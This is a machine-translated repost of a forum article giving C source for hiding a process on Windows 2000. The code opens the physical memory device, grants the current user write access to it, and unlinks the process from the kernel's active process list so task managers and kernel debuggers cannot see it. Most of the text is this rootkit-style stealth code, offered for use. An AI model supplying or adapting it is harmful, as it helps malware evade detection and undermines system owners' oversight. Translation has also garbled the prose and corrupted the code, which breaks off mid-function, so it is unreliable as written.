2. Tech
  3. A solution hidden under Win2000 process

A solution hidden under Win2000 process

xiaoxiao2021-03-06  120

A solution hidden under Win2000 process

【Key words: Win2000 Process hidden program entry: Zeng Source: huiyun.net Time: 2004-2-20 18:44:12 Click: 60 times

The last time I mentioned this thing, because it is very simple to feel that there is no need to say anything, but some people ask for writing, so add a few words: many posts have an analysis, such as APIHOOK, system service hook, etc. Thread injection does not have its own process, this is not "hidden". Here you write a completely hidden method of 2000, it is very simple, there is no new idea. Before explanation, first mention some structures, there are several processes related chains in the process enforcement block, one of which is the active process chain. One of the important roles of this chain is to query system information for traversing the current activity process. It is interesting that M $ may not use it due to efficiency factors that make it excluded from the process core block means that the thread switched switch is not taken, further It is said that it should not be negligible issues (this is the basis of this program). How to do it is obvious, delete the process you want to have in the bidirectional chain of the activity process or the core debugger (such as Softice / Proc) can not be found.

The code for hiding the current process under 2000 is as follows: #include #include #include #define nt_success (status) (status) (status) (status)> = 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK {NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; pvoid securityDescriptor; pvoid securityQualityofservice;} Object_attributes, * pobject_attributes; typedef ntstatus (callback * zwopens ECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; BOOL InitNTDLL () {g_hNtDLL = LoadLibrary ( "ntdll.dll"); if (! g_hNtDLL) {return FALSE;} RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, tlInitUnicodeString "); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hntdll, "zwopensection"); return true;} void closentdll () {if (g_hntdll! =

NULL) {FreeLibrary (g_hNtDLL);}} VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, ! NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee .TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = ! SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp: if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} HANDLE OpenPhysicalMemory () {NTSTATUS Status; unicode_string physmemstring; object_attributes attributes; rt lInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes. SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZWOPENSECTION (&)

(! NT_SUCCESS (status); | g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4,0,0x30000,0x1000); if (g_pMapPhysicalMemory == NULL) {return NULL;} Return g_hmpm;} Pvoid ​​LineTDRPHYS (Pulong Baseaddress, Pvoid ​​Addr) {Ulong Vaddr = (Ulong) Addr, PGDE, PTE, Paddr; PGDE = BaseAddress [VADDR >> 22]; IF ((PGDE & 1)! = 0) {ulong TMP = PGDE & 0x00000080; if (tmp = 0!) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG) PGDE) [(VADDR & 0x003FF000) >> 12]; IF ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFF000) (VADDR & 0x00000FFF); UnmapViewOffile (PVOID) PGDE);} else return 0;}} else return 0; return (PVOID) PAddr;} ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000 , 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} bool setdata (pvoid addr, ulong data) {Ulong Phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) return FALSE; tmp [ (PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); return true;} Bool HideProcessatall () {if (initntdll ()) {ix (OpenPhysicalMemory () == 0) {Return False;} ulong thread = GetData (PVOID) 0xffdff124); ulong process = getData (PVOID (Thread 0x22C)); Ulong FW = getData (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4)); setData (PVOID) FW 4), BW); SetData (PVOID (BW), FW);

转载请注明原文地址:https://www.9cbs.com/read-125849.html

9cbs

New Post(0)